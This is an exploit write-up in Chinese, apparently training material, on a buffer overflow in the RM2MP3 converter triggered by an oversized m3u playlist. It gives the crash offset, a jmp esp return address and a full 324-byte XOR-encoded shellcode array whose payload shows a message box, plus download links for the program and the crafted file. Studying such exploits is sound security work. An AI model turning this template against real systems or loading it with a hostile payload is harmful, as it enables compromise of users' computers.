RM2MP3溢出漏洞报告【利用篇】

版本：2.7.3.7000
工具：X32Dbg、010Editor、记事本
环境：win7 sp1 x86

时间：2016.12.22

漏洞原理

软件在读取m3u播放列表文件时，如果m3u大小在45Kb左右的时候会发生溢出。

1.首先准备一个m3u文件

里面填入“1111……”这样的数据，如下图所示：

2.拖拽m3u文件到程序窗口

程序崩溃,异常偏移是31313131,也就是1的ASCII表现形式

3.采用二分法,分割查找具体崩溃地点

4.插入特征数据

插入有规律的一行”A0A1……B0B1……”,再次进行前面的操作,找到异常偏移32473147，也就是G1G2的ASCII表现形式

5.修改溢出点数据

将溢出点的数据改为jmp esp汇编指令的地址，这里选择一个通用的0x7FFA4512，用16进制就是1245FA7F，如下图：

6.植入Shellcode

在溢出点后面加入shellcode（弹框“Hello 15PB”），这里采用加密shellcode的方式（为了不含有0x00和0x0A特殊含义的ASCII）插入，在真正的shellcode之前，加入一段解密代码，一起组成一段shellcode，如下图：

7.漏洞利用效果

弹出对话框“Hello 15PB”:

附shellcode代码:

unsigned char hexData[324] = {    0x12, 0x45, 0xFA, 0x7F, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x33, 0xC0, 0xE8, 0xFF, 0xFF,    0xFF, 0xFF, 0xC3, 0x58, 0x8D, 0x70, 0x1B, 0x33, 0xC9, 0x66, 0xB9, 0x17, 0x01, 0x8A, 0x04, 0x0E,    0x34, 0x01, 0x88, 0x04, 0x0E, 0xE2, 0xF6, 0x80, 0x34, 0x0E, 0x01, 0xFF, 0xE6, 0x82, 0xED, 0x71,    0xEA, 0x4D, 0x49, 0x64, 0x6D, 0x6D, 0x6E, 0x21, 0x30, 0x34, 0x51, 0x43, 0x01, 0x44, 0x79, 0x68,    0x75, 0x51, 0x73, 0x6E, 0x62, 0x64, 0x72, 0x72, 0x01, 0x4C, 0x64, 0x72, 0x72, 0x60, 0x66, 0x64,    0x43, 0x6E, 0x79, 0x40, 0x01, 0x4D, 0x6E, 0x60, 0x65, 0x4D, 0x68, 0x63, 0x73, 0x60, 0x73, 0x78,    0x44, 0x79, 0x40, 0x01, 0x74, 0x72, 0x64, 0x73, 0x32, 0x33, 0x2F, 0x65, 0x6D, 0x6D, 0x01, 0x46,    0x64, 0x75, 0x51, 0x73, 0x6E, 0x62, 0x40, 0x65, 0x65, 0x73, 0x64, 0x72, 0x72, 0x01, 0xE9, 0x01,    0x01, 0x01, 0x01, 0x5E, 0x56, 0x65, 0x8A, 0x34, 0x31, 0x01, 0x01, 0x01, 0x8A, 0x77, 0x0D, 0x8A,    0x77, 0x1D, 0x8A, 0x37, 0x8A, 0x5F, 0x09, 0x8A, 0x72, 0x3D, 0x02, 0xF2, 0x8A, 0x77, 0x79, 0x02,    0xF2, 0x8A, 0x57, 0x19, 0x8A, 0x47, 0x1D, 0x02, 0xC2, 0x8A, 0x7F, 0x25, 0x02, 0xFA, 0x56, 0x8A,    0x77, 0x21, 0x02, 0xF2, 0x32, 0xC8, 0x8A, 0x3D, 0x8F, 0x02, 0xFA, 0xEA, 0x06, 0x3A, 0xCB, 0x40,    0x74, 0xF5, 0xEA, 0x18, 0x50, 0x57, 0x8A, 0xF6, 0x8A, 0x7D, 0x25, 0x0D, 0x82, 0xEE, 0x15, 0xB8,    0x0E, 0x01, 0x01, 0x01, 0xFD, 0xF2, 0xA7, 0x5F, 0x58, 0x75, 0x02, 0xEA, 0xE1, 0xC2, 0x5E, 0x8C,    0x0D, 0x4E, 0x0E, 0xB6, 0x08, 0x8A, 0x05, 0x89, 0x02, 0xC2, 0x51, 0x52, 0x8A, 0x7D, 0x25, 0x09,    0x82, 0xEE, 0x2F, 0x56, 0x52, 0xFE, 0xD1, 0x8A, 0x7D, 0x25, 0x09, 0x82, 0xEE, 0x1E, 0x6B, 0x01,    0x6B, 0x01, 0x56, 0xFE, 0xD1, 0x8A, 0x7D, 0x25, 0x09, 0x82, 0xEE, 0x3B, 0x8A, 0x75, 0x25, 0x05,    0x56, 0x51, 0xFE, 0xD7, 0x51, 0x8A, 0x7D, 0x25, 0x0D, 0x82, 0xEE, 0x47, 0x8A, 0x75, 0x25, 0x09,    0x8A, 0x5D, 0x25, 0x05, 0x56, 0x52, 0xFE, 0xD7, 0x51, 0x8A, 0x7D, 0x25, 0x11, 0x8C, 0x46, 0xAE,    0x8A, 0x5D, 0x25, 0x05, 0x6B, 0x01, 0x51, 0x51, 0x6B, 0x01, 0xFE, 0xD2, 0x8A, 0x0D, 0x25, 0x6B,    0x01, 0xFE, 0xD0, 0x01 };

附:

原程序下载地址:

链接：http://pan.baidu.com/s/1c2Midc0 密码：z690

m3u播放列表文件下载地址:

链接：http://pan.baidu.com/s/1sl4gAs9 密码：qdml